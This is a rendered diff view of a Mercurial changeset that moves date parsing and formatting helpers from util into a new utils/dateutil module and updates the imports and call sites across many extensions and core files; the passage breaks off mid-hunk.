##// END OF EJS Templates
util: extract all date-related utils in utils/dateutil module...
Boris Feld -
r36625:c6061cad default
parent child Browse files
Show More
1 NO CONTENT: new file 100644
@@ -59,8 +59,8 b' from mercurial import ('
59 59 patch,
60 60 registrar,
61 61 scmutil,
62 util,
63 62 )
63 from mercurial.utils import dateutil
64 64
65 65 # Note for extension authors: ONLY specify testedwith = 'ships-with-hg-core' for
66 66 # extensions which SHIP WITH MERCURIAL. Non-mainline extensions should
@@ -382,7 +382,7 b' def synthesize(ui, repo, descpath, **opt'
382 382 message = 'synthesized wide repo with %d files' % (len(files),)
383 383 mc = context.memctx(repo, [pctx.node(), nullid], message,
384 384 files, filectxfn, ui.username(),
385 '%d %d' % util.makedate())
385 '%d %d' % dateutil.makedate())
386 386 initnode = mc.commit()
387 387 if ui.debugflag:
388 388 hexfn = hex
@@ -49,6 +49,7 b' from mercurial import ('
49 49 ui as uimod,
50 50 util,
51 51 )
52 from mercurial.utils import dateutil
52 53
53 54 # Note for extension authors: ONLY specify testedwith = 'ships-with-hg-core' for
54 55 # extensions which SHIP WITH MERCURIAL. Non-mainline extensions should
@@ -164,7 +165,7 b' def wrapui(ui):'
164 165 return
165 166 ui._bbinlog = True
166 167 default = self.configdate('devel', 'default-date')
167 date = util.datestr(default, '%Y/%m/%d %H:%M:%S')
168 date = dateutil.datestr(default, '%Y/%m/%d %H:%M:%S')
168 169 user = util.getuser()
169 170 pid = '%d' % util.getpid()
170 171 formattedmsg = msg[0] % msg[1:]
@@ -23,8 +23,8 b' from mercurial import ('
23 23 pycompat,
24 24 registrar,
25 25 scmutil,
26 util,
27 26 )
27 from mercurial.utils import dateutil
28 28
29 29 cmdtable = {}
30 30 command = registrar.command(cmdtable)
@@ -65,7 +65,7 b' def countrate(ui, repo, amap, *pats, **o'
65 65 rate = {}
66 66 df = False
67 67 if opts.get('date'):
68 df = util.matchdate(opts['date'])
68 df = dateutil.matchdate(opts['date'])
69 69
70 70 m = scmutil.match(repo[None], pats, opts)
71 71 def prep(ctx, fns):
@@ -541,7 +541,7 b' class mapfile(dict):'
541 541 self.fp = None
542 542
543 543 def makedatetimestamp(t):
544 """Like util.makedate() but for time t instead of current time"""
544 """Like dateutil.makedate() but for time t instead of current time"""
545 545 delta = (datetime.datetime.utcfromtimestamp(t) -
546 546 datetime.datetime.fromtimestamp(t))
547 547 tz = delta.days * 86400 + delta.seconds
@@ -19,6 +19,7 b' from mercurial import ('
19 19 scmutil,
20 20 util,
21 21 )
22 from mercurial.utils import dateutil
22 23
23 24 from . import (
24 25 bzr,
@@ -355,7 +356,7 b' class converter(object):'
355 356 dates = {}
356 357 def getdate(n):
357 358 if n not in dates:
358 dates[n] = util.parsedate(self.commitcache[n].date)
359 dates[n] = dateutil.parsedate(self.commitcache[n].date)
359 360 return dates[n]
360 361
361 362 def picknext(nodes):
@@ -18,6 +18,7 b' from mercurial import ('
18 18 pycompat,
19 19 util,
20 20 )
21 from mercurial.utils import dateutil
21 22
22 23 from . import (
23 24 common,
@@ -93,7 +94,7 b' class convert_cvs(converter_source):'
93 94 cs.comment = self.recode(cs.comment)
94 95 if self.ui.configbool('convert', 'localtimezone'):
95 96 cs.date = makedatetimestamp(cs.date[0])
96 date = util.datestr(cs.date, '%Y-%m-%d %H:%M:%S %1%2')
97 date = dateutil.datestr(cs.date, '%Y-%m-%d %H:%M:%S %1%2')
97 98 self.tags.update(dict.fromkeys(cs.tags, id))
98 99
99 100 files = {}
@@ -17,6 +17,7 b' from mercurial import ('
17 17 pycompat,
18 18 util,
19 19 )
20 from mercurial.utils import dateutil
20 21
21 22 pickle = util.pickle
22 23
@@ -192,7 +193,7 b' def createlog(ui, directory=None, root="'
192 193
193 194 if oldlog:
194 195 date = oldlog[-1].date # last commit date as a (time,tz) tuple
195 date = util.datestr(date, '%Y/%m/%d %H:%M:%S %1%2')
196 date = dateutil.datestr(date, '%Y/%m/%d %H:%M:%S %1%2')
196 197
197 198 # build the CVS commandline
198 199 cmd = ['cvs', '-q']
@@ -336,7 +337,7 b' def createlog(ui, directory=None, root="'
336 337 if len(d.split()) != 3:
337 338 # cvs log dates always in GMT
338 339 d = d + ' UTC'
339 e.date = util.parsedate(d, ['%y/%m/%d %H:%M:%S',
340 e.date = dateutil.parsedate(d, ['%y/%m/%d %H:%M:%S',
340 341 '%Y/%m/%d %H:%M:%S',
341 342 '%Y-%m-%d %H:%M:%S'])
342 343 e.author = scache(match.group(2))
@@ -901,7 +902,7 b' def debugcvsps(ui, *args, **opts):'
901 902 # bug-for-bug compatibility with cvsps.
902 903 ui.write('---------------------\n')
903 904 ui.write(('PatchSet %d \n' % cs.id))
904 ui.write(('Date: %s\n' % util.datestr(cs.date,
905 ui.write(('Date: %s\n' % dateutil.datestr(cs.date,
905 906 '%Y/%m/%d %H:%M:%S %1%2')))
906 907 ui.write(('Author: %s\n' % cs.author))
907 908 ui.write(('Branch: %s\n' % (cs.branch or 'HEAD')))
@@ -16,6 +16,7 b' from mercurial import ('
16 16 error,
17 17 util,
18 18 )
19 from mercurial.utils import dateutil
19 20 from . import common
20 21 NoRepo = common.NoRepo
21 22
@@ -148,12 +149,14 b' class darcs_source(common.converter_sour'
148 149
149 150 def getcommit(self, rev):
150 151 elt = self.changes[rev]
151 date = util.strdate(elt.get('local_date'), '%a %b %d %H:%M:%S %Z %Y')
152 dateformat = '%a %b %d %H:%M:%S %Z %Y'
153 date = dateutil.strdate(elt.get('local_date'), dateformat)
152 154 desc = elt.findtext('name') + '\n' + elt.findtext('comment', '')
153 155 # etree can return unicode objects for name, comment, and author,
154 156 # so recode() is used to ensure str objects are emitted.
157 newdateformat = '%Y-%m-%d %H:%M:%S %1%2'
155 158 return common.commit(author=self.recode(elt.get('author')),
156 date=util.datestr(date, '%Y-%m-%d %H:%M:%S %1%2'),
159 date=dateutil.datestr(date, newdateformat),
157 160 desc=self.recode(desc).strip(),
158 161 parents=self.parents[rev])
159 162
@@ -19,6 +19,7 b' from mercurial import ('
19 19 error,
20 20 util,
21 21 )
22 from mercurial.utils import dateutil
22 23 from . import common
23 24
24 25 class gnuarch_source(common.converter_source, common.commandline):
@@ -280,8 +281,8 b' class gnuarch_source(common.converter_so'
280 281 catlog = self.catlogparser.parsestr(data)
281 282
282 283 # Commit date
283 self.changes[rev].date = util.datestr(
284 util.strdate(catlog['Standard-date'],
284 self.changes[rev].date = dateutil.datestr(
285 dateutil.strdate(catlog['Standard-date'],
285 286 '%Y-%m-%d %H:%M:%S'))
286 287
287 288 # Commit author
@@ -36,6 +36,7 b' from mercurial import ('
36 36 scmutil,
37 37 util,
38 38 )
39 from mercurial.utils import dateutil
39 40 stringio = util.stringio
40 41
41 42 from . import common
@@ -583,7 +584,7 b' class mercurial_source(common.converter_'
583 584 crev = rev
584 585
585 586 return common.commit(author=ctx.user(),
586 date=util.datestr(ctx.date(),
587 date=dateutil.datestr(ctx.date(),
587 588 '%Y-%m-%d %H:%M:%S %1%2'),
588 589 desc=ctx.description(),
589 590 rev=crev,
@@ -14,8 +14,8 b' from mercurial.i18n import _'
14 14 from mercurial import (
15 15 error,
16 16 pycompat,
17 util,
18 17 )
18 from mercurial.utils import dateutil
19 19
20 20 from . import common
21 21
@@ -310,9 +310,10 b' class monotone_source(common.converter_s'
310 310 certs = self.mtngetcerts(rev)
311 311 if certs.get('suspend') == certs["branch"]:
312 312 extra['close'] = 1
313 dateformat = "%Y-%m-%dT%H:%M:%S"
313 314 return common.commit(
314 315 author=certs["author"],
315 date=util.datestr(util.strdate(certs["date"], "%Y-%m-%dT%H:%M:%S")),
316 date=dateutil.datestr(dateutil.strdate(certs["date"], dateformat)),
316 317 desc=certs["changelog"],
317 318 rev=rev,
318 319 parents=self.mtnrun("parents", rev).splitlines(),
@@ -14,6 +14,7 b' from mercurial import ('
14 14 error,
15 15 util,
16 16 )
17 from mercurial.utils import dateutil
17 18
18 19 from . import common
19 20
@@ -346,7 +347,7 b' class p4_source(common.converter_source)'
346 347 parents = []
347 348
348 349 return common.commit(author=self.recode(obj["user"]),
349 date=util.datestr(date, '%Y-%m-%d %H:%M:%S %1%2'),
350 date=dateutil.datestr(date, '%Y-%m-%d %H:%M:%S %1%2'),
350 351 parents=parents, desc=desc, branch=None, rev=obj['change'],
351 352 extra={"p4": obj['change'], "convert_revision": obj['change']})
352 353
@@ -16,6 +16,7 b' from mercurial import ('
16 16 util,
17 17 vfs as vfsmod,
18 18 )
19 from mercurial.utils import dateutil
19 20
20 21 from . import common
21 22
@@ -891,7 +892,7 b' class svn_source(converter_source):'
891 892 # Example SVN datetime. Includes microseconds.
892 893 # ISO-8601 conformant
893 894 # '2007-01-04T17:35:00.902377Z'
894 date = util.parsedate(date[:19] + " UTC", ["%Y-%m-%dT%H:%M:%S"])
895 date = dateutil.parsedate(date[:19] + " UTC", ["%Y-%m-%dT%H:%M:%S"])
895 896 if self.ui.configbool('convert', 'localtimezone'):
896 897 date = makedatetimestamp(date[0])
897 898
@@ -913,7 +914,7 b' class svn_source(converter_source):'
913 914 branch = None
914 915
915 916 cset = commit(author=author,
916 date=util.datestr(date, '%Y-%m-%d %H:%M:%S %1%2'),
917 date=dateutil.datestr(date, '%Y-%m-%d %H:%M:%S %1%2'),
917 918 desc=log,
918 919 parents=parents,
919 920 branch=branch,
@@ -23,6 +23,7 b' from mercurial import ('
23 23 registrar,
24 24 util,
25 25 )
26 from mercurial.utils import dateutil
26 27
27 28 release = lock.release
28 29 cmdtable = {}
@@ -64,7 +65,7 b" def fetch(ui, repo, source='default', **"
64 65 opts = pycompat.byteskwargs(opts)
65 66 date = opts.get('date')
66 67 if date:
67 opts['date'] = util.parsedate(date)
68 opts['date'] = dateutil.parsedate(date)
68 69
69 70 parent, _p2 = repo.dirstate.parents()
70 71 branch = repo.dirstate.branch()
@@ -21,6 +21,7 b' from mercurial import ('
21 21 registrar,
22 22 util,
23 23 )
24 from mercurial.utils import dateutil
24 25
25 26 cmdtable = {}
26 27 command = registrar.command(cmdtable)
@@ -258,7 +259,7 b' def _dosign(ui, repo, *revs, **opts):'
258 259
259 260 date = opts.get('date')
260 261 if date:
261 opts['date'] = util.parsedate(date)
262 opts['date'] = dateutil.parsedate(date)
262 263
263 264 if revs:
264 265 nodes = [repo.lookup(n) for n in revs]
@@ -35,6 +35,7 b' from mercurial import ('
35 35 registrar,
36 36 util,
37 37 )
38 from mercurial.utils import dateutil
38 39
39 40 cmdtable = {}
40 41 command = registrar.command(cmdtable)
@@ -326,7 +327,7 b' class journalstorage(object):'
326 327 newhashes = [newhashes]
327 328
328 329 entry = journalentry(
329 util.makedate(), self.user, self.command, namespace, name,
330 dateutil.makedate(), self.user, self.command, namespace, name,
330 331 oldhashes, newhashes)
331 332
332 333 vfs = self.vfs
@@ -111,6 +111,7 b' from mercurial import ('
111 111 templatefilters,
112 112 util,
113 113 )
114 from mercurial.utils import dateutil
114 115
115 116 cmdtable = {}
116 117 command = registrar.command(cmdtable)
@@ -156,21 +157,23 b" configitem('keywordset', 'svn',"
156 157 def utcdate(text):
157 158 '''Date. Returns a UTC-date in this format: "2009/08/18 11:00:13".
158 159 '''
159 return util.datestr((util.parsedate(text)[0], 0), '%Y/%m/%d %H:%M:%S')
160 dateformat = '%Y/%m/%d %H:%M:%S'
161 return dateutil.datestr((dateutil.parsedate(text)[0], 0), dateformat)
160 162 # date like in svn's $Date
161 163 @templatefilter('svnisodate')
162 164 def svnisodate(text):
163 165 '''Date. Returns a date in this format: "2009-08-18 13:00:13
164 166 +0200 (Tue, 18 Aug 2009)".
165 167 '''
166 return util.datestr(text, '%Y-%m-%d %H:%M:%S %1%2 (%a, %d %b %Y)')
168 return dateutil.datestr(text, '%Y-%m-%d %H:%M:%S %1%2 (%a, %d %b %Y)')
167 169 # date like in svn's $Id
168 170 @templatefilter('svnutcdate')
169 171 def svnutcdate(text):
170 172 '''Date. Returns a UTC-date in this format: "2009-08-18
171 173 11:00:13Z".
172 174 '''
173 return util.datestr((util.parsedate(text)[0], 0), '%Y-%m-%d %H:%M:%SZ')
175 dateformat = '%Y-%m-%d %H:%M:%SZ'
176 return dateutil.datestr((dateutil.parsedate(text)[0], 0), dateformat)
174 177
175 178 # make keyword tools accessible
176 179 kwtools = {'hgcmd': ''}
@@ -98,6 +98,7 b' from mercurial import ('
98 98 util,
99 99 vfs as vfsmod,
100 100 )
101 from mercurial.utils import dateutil
101 102
102 103 release = lockmod.release
103 104 seriesopts = [('s', 'summary', None, _('print first line of patch header'))]
@@ -1201,7 +1202,7 b' class queue(object):'
1201 1202 user = opts.get('user')
1202 1203 date = opts.get('date')
1203 1204 if date:
1204 date = util.parsedate(date)
1205 date = dateutil.parsedate(date)
1205 1206 diffopts = self.diffopts({'git': opts.get('git')}, plain=True)
1206 1207 if opts.get('checkname', True):
1207 1208 self.checkpatchname(patchfn)
@@ -1644,7 +1645,7 b' class queue(object):'
1644 1645 newuser = opts.get('user')
1645 1646 newdate = opts.get('date')
1646 1647 if newdate:
1647 newdate = '%d %d' % util.parsedate(newdate)
1648 newdate = '%d %d' % dateutil.parsedate(newdate)
1648 1649 wlock = repo.wlock()
1649 1650
1650 1651 try:
@@ -2596,7 +2597,7 b' def setupheaderopts(ui, opts):'
2596 2597 if not opts.get('user') and opts.get('currentuser'):
2597 2598 opts['user'] = ui.username()
2598 2599 if not opts.get('date') and opts.get('currentdate'):
2599 opts['date'] = "%d %d" % util.makedate()
2600 opts['date'] = "%d %d" % dateutil.makedate()
2600 2601
2601 2602 @command("^qnew",
2602 2603 [('e', 'edit', None, _('invoke editor on commit messages')),
@@ -149,6 +149,7 b' from mercurial import ('
149 149 registrar,
150 150 util,
151 151 )
152 from mercurial.utils import dateutil
152 153
153 154 # Note for extension authors: ONLY specify testedwith = 'ships-with-hg-core' for
154 155 # extensions which SHIP WITH MERCURIAL. Non-mainline extensions should
@@ -360,7 +361,7 b' class notifier(object):'
360 361 for k, v in headers:
361 362 msg[k] = v
362 363
363 msg['Date'] = util.datestr(format="%a, %d %b %Y %H:%M:%S %1%2")
364 msg['Date'] = dateutil.datestr(format="%a, %d %b %Y %H:%M:%S %1%2")
364 365
365 366 # try to make subject line exist and be useful
366 367 if not subject:
@@ -99,6 +99,7 b' from mercurial import ('
99 99 templater,
100 100 util,
101 101 )
102 from mercurial.utils import dateutil
102 103 stringio = util.stringio
103 104
104 105 cmdtable = {}
@@ -665,9 +666,9 b' def email(ui, repo, *revs, **opts):'
665 666
666 667 # start
667 668 if date:
668 start_time = util.parsedate(date)
669 start_time = dateutil.parsedate(date)
669 670 else:
670 start_time = util.makedate()
671 start_time = dateutil.makedate()
671 672
672 673 def genmsgid(id):
673 674 return '<%s.%d@%s>' % (id[:20], int(start_time[0]),
@@ -55,6 +55,7 b' from mercurial import ('
55 55 from . import (
56 56 rebase,
57 57 )
58 from mercurial.utils import dateutil
58 59
59 60 cmdtable = {}
60 61 command = registrar.command(cmdtable)
@@ -563,7 +564,8 b' def listcmd(ui, repo, pats, opts):'
563 564 continue
564 565 ui.write(' ' * (16 - len(sname)))
565 566 used = 16
566 age = '(%s)' % templatefilters.age(util.makedate(mtime), abbrev=True)
567 date = dateutil.makedate(mtime)
568 age = '(%s)' % templatefilters.age(date, abbrev=True)
567 569 ui.write(age, label='shelve.age')
568 570 ui.write(' ' * (12 - len(age)))
569 571 used += 12
@@ -24,6 +24,7 b' from . import ('
24 24 revlog,
25 25 util,
26 26 )
27 from .utils import dateutil
27 28
28 29 _defaultextra = {'branch': 'default'}
29 30
@@ -524,9 +525,9 b' class changelog(revlog.revlog):'
524 525 desc = stripdesc(desc)
525 526
526 527 if date:
527 parseddate = "%d %d" % util.parsedate(date)
528 parseddate = "%d %d" % dateutil.parsedate(date)
528 529 else:
529 parseddate = "%d %d" % util.makedate()
530 parseddate = "%d %d" % dateutil.makedate()
530 531 if extra:
531 532 branch = extra.get("branch")
532 533 if branch in ("default", ""):
@@ -47,6 +47,7 b' from . import ('
47 47 util,
48 48 vfs as vfsmod,
49 49 )
50 from .utils import dateutil
50 51 stringio = util.stringio
51 52
52 53 # templates of common command options
@@ -1530,7 +1531,7 b' def _exportsingle(repo, ctx, match, swit'
1530 1531 write("# HG changeset patch\n")
1531 1532 write("# User %s\n" % ctx.user())
1532 1533 write("# Date %d %d\n" % ctx.date())
1533 write("# %s\n" % util.datestr(ctx.date()))
1534 write("# %s\n" % dateutil.datestr(ctx.date()))
1534 1535 if branch and branch != 'default':
1535 1536 write("# Branch %s\n" % branch)
1536 1537 write("# Node ID %s\n" % hex(node))
@@ -1629,7 +1630,7 b' def showmarker(fm, marker, index=None):'
1629 1630 def finddate(ui, repo, date):
1630 1631 """Find the tipmost changeset that matches the given date spec"""
1631 1632
1632 df = util.matchdate(date)
1633 df = dateutil.matchdate(date)
1633 1634 m = scmutil.matchall(repo)
1634 1635 results = {}
1635 1636
@@ -1642,7 +1643,7 b' def finddate(ui, repo, date):'
1642 1643 rev = ctx.rev()
1643 1644 if rev in results:
1644 1645 ui.status(_("found revision %s from %s\n") %
1645 (rev, util.datestr(results[rev])))
1646 (rev, dateutil.datestr(results[rev])))
1646 1647 return '%d' % rev
1647 1648
1648 1649 raise error.Abort(_("revision matching date not found"))
@@ -2261,7 +2262,7 b' def commit(ui, repo, commitfunc, pats, o'
2261 2262 '''commit the specified files or all outstanding changes'''
2262 2263 date = opts.get('date')
2263 2264 if date:
2264 opts['date'] = util.parsedate(date)
2265 opts['date'] = dateutil.parsedate(date)
2265 2266 message = logmessage(ui, opts)
2266 2267 matcher = scmutil.match(repo[None], pats, opts)
2267 2268
@@ -2326,7 +2327,7 b' def amend(ui, repo, old, extra, pats, op'
2326 2327 date = opts.get('date') or old.date()
2327 2328
2328 2329 # Parse the date to allow comparison between date and old.date()
2329 date = util.parsedate(date)
2330 date = dateutil.parsedate(date)
2330 2331
2331 2332 if len(old.parents()) > 1:
2332 2333 # ctx.files() isn't reliable for merges, so fall back to the
@@ -61,6 +61,7 b' from . import ('
61 61 util,
62 62 wireprotoserver,
63 63 )
64 from .utils import dateutil
64 65
65 66 release = lockmod.release
66 67
@@ -302,9 +303,9 b' def annotate(ui, repo, *pats, **opts):'
302 303
303 304 rootfm = ui.formatter('annotate', opts)
304 305 if ui.quiet:
305 datefunc = util.shortdate
306 datefunc = dateutil.shortdate
306 307 else:
307 datefunc = util.datestr
308 datefunc = dateutil.datestr
308 309 if ctx.rev() is None:
309 310 def hexfn(node):
310 311 if node is None:
@@ -584,7 +585,7 b' def _dobackout(ui, repo, node=None, rev='
584 585
585 586 date = opts.get('date')
586 587 if date:
587 opts['date'] = util.parsedate(date)
588 opts['date'] = dateutil.parsedate(date)
588 589
589 590 cmdutil.checkunfinished(repo)
590 591 cmdutil.bailifchanged(repo)
@@ -2161,7 +2162,7 b' def _dograft(ui, repo, *revs, **opts):'
2161 2162 if not opts.get('user') and opts.get('currentuser'):
2162 2163 opts['user'] = ui.username()
2163 2164 if not opts.get('date') and opts.get('currentdate'):
2164 opts['date'] = "%d %d" % util.makedate()
2165 opts['date'] = "%d %d" % dateutil.makedate()
2165 2166
2166 2167 editor = cmdutil.getcommiteditor(editform='graft',
2167 2168 **pycompat.strkwargs(opts))
@@ -3011,7 +3012,7 b' def import_(ui, repo, patch1=None, *patc'
3011 3012
3012 3013 date = opts.get('date')
3013 3014 if date:
3014 opts['date'] = util.parsedate(date)
3015 opts['date'] = dateutil.parsedate(date)
3015 3016
3016 3017 exact = opts.get('exact')
3017 3018 update = not opts.get('bypass')
@@ -5307,7 +5308,7 b' def tag(ui, repo, name1, *names, **opts)'
5307 5308
5308 5309 date = opts.get('date')
5309 5310 if date:
5310 date = util.parsedate(date)
5311 date = dateutil.parsedate(date)
5311 5312
5312 5313 if opts.get('remove'):
5313 5314 editform = 'tag.remove'
@@ -49,6 +49,7 b' from . import ('
49 49 subrepoutil,
50 50 util,
51 51 )
52 from .utils import dateutil
52 53
53 54 propertycache = util.propertycache
54 55
@@ -1287,7 +1288,7 b' class committablectx(basectx):'
1287 1288 self._node = None
1288 1289 self._text = text
1289 1290 if date:
1290 self._date = util.parsedate(date)
1291 self._date = dateutil.parsedate(date)
1291 1292 if user:
1292 1293 self._user = user
1293 1294 if changes:
@@ -1364,7 +1365,7 b' class committablectx(basectx):'
1364 1365 ui = self._repo.ui
1365 1366 date = ui.configdate('devel', 'default-date')
1366 1367 if date is None:
1367 date = util.makedate()
1368 date = dateutil.makedate()
1368 1369 return date
1369 1370
1370 1371 def subrev(self, subpath):
@@ -2111,11 +2112,11 b' class overlayworkingctx(committablectx):'
2111 2112 if data is None:
2112 2113 raise error.ProgrammingError("data must be non-None")
2113 2114 self._auditconflicts(path)
2114 self._markdirty(path, exists=True, data=data, date=util.makedate(),
2115 self._markdirty(path, exists=True, data=data, date=dateutil.makedate(),
2115 2116 flags=flags)
2116 2117
2117 2118 def setflags(self, path, l, x):
2118 self._markdirty(path, exists=True, date=util.makedate(),
2119 self._markdirty(path, exists=True, date=dateutil.makedate(),
2119 2120 flags=(l and 'l' or '') + (x and 'x' or ''))
2120 2121
2121 2122 def remove(self, path):
@@ -2404,7 +2405,7 b' class memctx(committablectx):'
2404 2405
2405 2406 user receives the committer name and defaults to current
2406 2407 repository username, date is the commit date in any format
2407 supported by util.parsedate() and defaults to current date, extra
2408 supported by dateutil.parsedate() and defaults to current date, extra
2408 2409 is a dictionary of metadata or is left empty.
2409 2410 """
2410 2411
@@ -2619,7 +2620,7 b' class metadataonlyctx(committablectx):'
2619 2620
2620 2621 user receives the committer name and defaults to current repository
2621 2622 username, date is the commit date in any format supported by
2622 util.parsedate() and defaults to current date, extra is a dictionary of
2623 dateutil.parsedate() and defaults to current date, extra is a dictionary of
2623 2624 metadata or is left empty.
2624 2625 """
2625 2626 def __new__(cls, repo, originalctx, *args, **kwargs):
@@ -77,6 +77,7 b' from . import ('
77 77 vfs as vfsmod,
78 78 wireprotoserver,
79 79 )
80 from .utils import dateutil
80 81
81 82 release = lockmod.release
82 83
@@ -560,13 +561,13 b' def debugdata(ui, repo, file_, rev=None,'
560 561 def debugdate(ui, date, range=None, **opts):
561 562 """parse and display a date"""
562 563 if opts[r"extended"]:
563 d = util.parsedate(date, util.extendeddateformats)
564 d = dateutil.parsedate(date, util.extendeddateformats)
564 565 else:
565 d = util.parsedate(date)
566 d = dateutil.parsedate(date)
566 567 ui.write(("internal: %d %d\n") % d)
567 ui.write(("standard: %s\n") % util.datestr(d))
568 ui.write(("standard: %s\n") % dateutil.datestr(d))
568 569 if range:
569 m = util.matchdate(range)
570 m = dateutil.matchdate(range)
570 571 ui.write(("match: %s\n") % m(d[0]))
571 572
572 573 @command('debugdeltachain',
@@ -1578,7 +1579,7 b' def debugobsolete(ui, repo, precursor=No'
1578 1579 try:
1579 1580 date = opts.get('date')
1580 1581 if date:
1581 date = util.parsedate(date)
1582 date = dateutil.parsedate(date)
1582 1583 else:
1583 1584 date = None
1584 1585 prec = parsenodeid(precursor)
@@ -126,6 +126,7 b' from . import ('
126 126 templater,
127 127 util,
128 128 )
129 from .utils import dateutil
129 130
130 131 pickle = util.pickle
131 132
@@ -243,7 +244,7 b' class _plainconverter(object):'
243 244 @staticmethod
244 245 def formatdate(date, fmt):
245 246 '''stringify date tuple in the given format'''
246 return util.datestr(date, fmt)
247 return dateutil.datestr(date, fmt)
247 248 @staticmethod
248 249 def formatdict(data, key, value, fmt, sep):
249 250 '''stringify key-value pairs separated by sep'''
@@ -46,6 +46,7 b' from . import ('
46 46 webutil,
47 47 wsgicgi,
48 48 )
49 from ..utils import dateutil
49 50
50 51 def cleannames(items):
51 52 return [(util.pconvert(name).strip('/'), path) for name, path in items]
@@ -376,7 +377,7 b' class hgwebdir(object):'
376 377 if directory:
377 378 # get the directory's time information
378 379 try:
379 d = (get_mtime(path), util.makedate()[1])
380 d = (get_mtime(path), dateutil.makedate()[1])
380 381 except OSError:
381 382 continue
382 383
@@ -425,7 +426,7 b' class hgwebdir(object):'
425 426 u.warn(_('error accessing repository at %s\n') % path)
426 427 continue
427 428 try:
428 d = (get_mtime(r.spath), util.makedate()[1])
429 d = (get_mtime(r.spath), dateutil.makedate()[1])
429 430 except OSError:
430 431 continue
431 432
@@ -35,6 +35,7 b' from . import ('
35 35 templater,
36 36 util,
37 37 )
38 from .utils import dateutil
38 39
39 40 def getlimit(opts):
40 41 """get the log limit according to option -l/--limit"""
@@ -229,7 +230,7 b' class changesetprinter(object):'
229 230 % scmutil.formatrevnode(self.ui, mrev, mnode),
230 231 label='ui.debug log.manifest')
231 232 self.ui.write(columns['user'] % ctx.user(), label='log.user')
232 self.ui.write(columns['date'] % util.datestr(ctx.date()),
233 self.ui.write(columns['date'] % dateutil.datestr(ctx.date()),
233 234 label='log.date')
234 235
235 236 if ctx.isunstable():
@@ -19,6 +19,7 b' from . import ('
19 19 pycompat,
20 20 util,
21 21 )
22 from .utils import dateutil
22 23
23 24 _missing_newline_marker = "\\ No newline at end of file\n"
24 25
@@ -255,7 +256,7 b' def unidiff(a, ad, b, bd, fn1, fn2, bina'
255 256 aprefix = 'a/'
256 257 bprefix = 'b/'
257 258
258 epoch = util.datestr((0, 0))
259 epoch = dateutil.datestr((0, 0))
259 260
260 261 fn1 = util.pconvert(fn1)
261 262 fn2 = util.pconvert(fn2)
@@ -81,6 +81,7 b' from . import ('
81 81 policy,
82 82 util,
83 83 )
84 from .utils import dateutil
84 85
85 86 parsers = policy.importmod(r'parsers')
86 87
@@ -601,13 +602,13 b' class obsstore(object):'
601 602 if date is None:
602 603 if 'date' in metadata:
603 604 # as a courtesy for out-of-tree extensions
604 date = util.parsedate(metadata.pop('date'))
605 date = dateutil.parsedate(metadata.pop('date'))
605 606 elif ui is not None:
606 607 date = ui.configdate('devel', 'default-date')
607 608 if date is None:
608 date = util.makedate()
609 date = dateutil.makedate()
609 610 else:
610 date = util.makedate()
611 date = dateutil.makedate()
611 612 if len(prec) != 20:
612 613 raise ValueError(prec)
613 614 for succ in succs:
@@ -15,6 +15,7 b' from . import ('
15 15 phases,
16 16 util,
17 17 )
18 from .utils import dateutil
18 19
19 20 class marker(object):
20 21 """Wrap obsolete marker raw data"""
@@ -841,11 +842,11 b' def obsfateprinter(successors, markers, '
841 842 max_date = max(dates)
842 843
843 844 if min_date == max_date:
844 fmtmin_date = util.datestr(min_date, '%Y-%m-%d %H:%M %1%2')
845 fmtmin_date = dateutil.datestr(min_date, '%Y-%m-%d %H:%M %1%2')
845 846 line.append(" (at %s)" % fmtmin_date)
846 847 else:
847 fmtmin_date = util.datestr(min_date, '%Y-%m-%d %H:%M %1%2')
848 fmtmax_date = util.datestr(max_date, '%Y-%m-%d %H:%M %1%2')
848 fmtmin_date = dateutil.datestr(min_date, '%Y-%m-%d %H:%M %1%2')
849 fmtmax_date = dateutil.datestr(max_date, '%Y-%m-%d %H:%M %1%2')
849 850 line.append(" (between %s and %s)" % (fmtmin_date, fmtmax_date))
850 851
851 852 return "".join(line)
@@ -40,6 +40,7 b' from . import ('
40 40 util,
41 41 vfs as vfsmod,
42 42 )
43 from .utils import dateutil
43 44
44 45 diffhelpers = policy.importmod(r'diffhelpers')
45 46 stringio = util.stringio
@@ -2669,8 +2670,8 b' def trydiff(repo, revs, ctx1, ctx2, modi'
2669 2670 def isempty(fctx):
2670 2671 return fctx is None or fctx.size() == 0
2671 2672
2672 date1 = util.datestr(ctx1.date())
2673 date2 = util.datestr(ctx2.date())
2673 date1 = dateutil.datestr(ctx1.date())
2674 date2 = dateutil.datestr(ctx2.date())
2674 2675
2675 2676 gitmode = {'l': '120000', 'x': '100755', '': '100644'}
2676 2677
@@ -30,6 +30,7 b' from . import ('
30 30 smartset,
31 31 util,
32 32 )
33 from .utils import dateutil
33 34
34 35 # helpers for processing parsed tree
35 36 getsymbol = revsetlang.getsymbol
@@ -658,7 +659,7 b' def date(repo, subset, x):'
658 659 """
659 660 # i18n: "date" is a keyword
660 661 ds = getstring(x, _("date requires a string"))
661 dm = util.matchdate(ds)
662 dm = dateutil.matchdate(ds)
662 663 return subset.filter(lambda x: dm(repo[x].date()[0]),
663 664 condrepr=('<date %r>', ds))
664 665
@@ -36,6 +36,7 b' from . import ('
36 36 util,
37 37 vfs as vfsmod,
38 38 )
39 from .utils import dateutil
39 40
40 41 hg = None
41 42 reporelpath = subrepoutil.reporelpath
@@ -1467,7 +1468,7 b' class gitsubrepo(abstractsubrepo):'
1467 1468 if date:
1468 1469 # git's date parser silently ignores when seconds < 1e9
1469 1470 # convert to ISO8601
1470 env['GIT_AUTHOR_DATE'] = util.datestr(date,
1471 env['GIT_AUTHOR_DATE'] = dateutil.datestr(date,
1471 1472 '%Y-%m-%dT%H:%M:%S %1%2')
1472 1473 self._gitcommand(cmd, env=env)
1473 1474 # make sure commit works otherwise HEAD might not exist under certain
@@ -22,6 +22,7 b' from . import ('
22 22 url,
23 23 util,
24 24 )
25 from .utils import dateutil
25 26
26 27 urlerr = util.urlerr
27 28 urlreq = util.urlreq
@@ -78,7 +79,7 b' def age(date, abbrev=False):'
78 79 else:
79 80 delta = max(1, int(now - then))
80 81 if delta > agescales[0][1] * 2:
81 return util.shortdate(date)
82 return dateutil.shortdate(date)
82 83
83 84 for t, s, a in agescales:
84 85 n = delta // s
@@ -203,7 +204,7 b' def isodate(text):'
203 204 """Date. Returns the date in ISO 8601 format: "2009-08-18 13:00
204 205 +0200".
205 206 """
206 return util.datestr(text, '%Y-%m-%d %H:%M %1%2')
207 return dateutil.datestr(text, '%Y-%m-%d %H:%M %1%2')
207 208
208 209 @templatefilter('isodatesec')
209 210 def isodatesec(text):
@@ -211,7 +212,7 b' def isodatesec(text):'
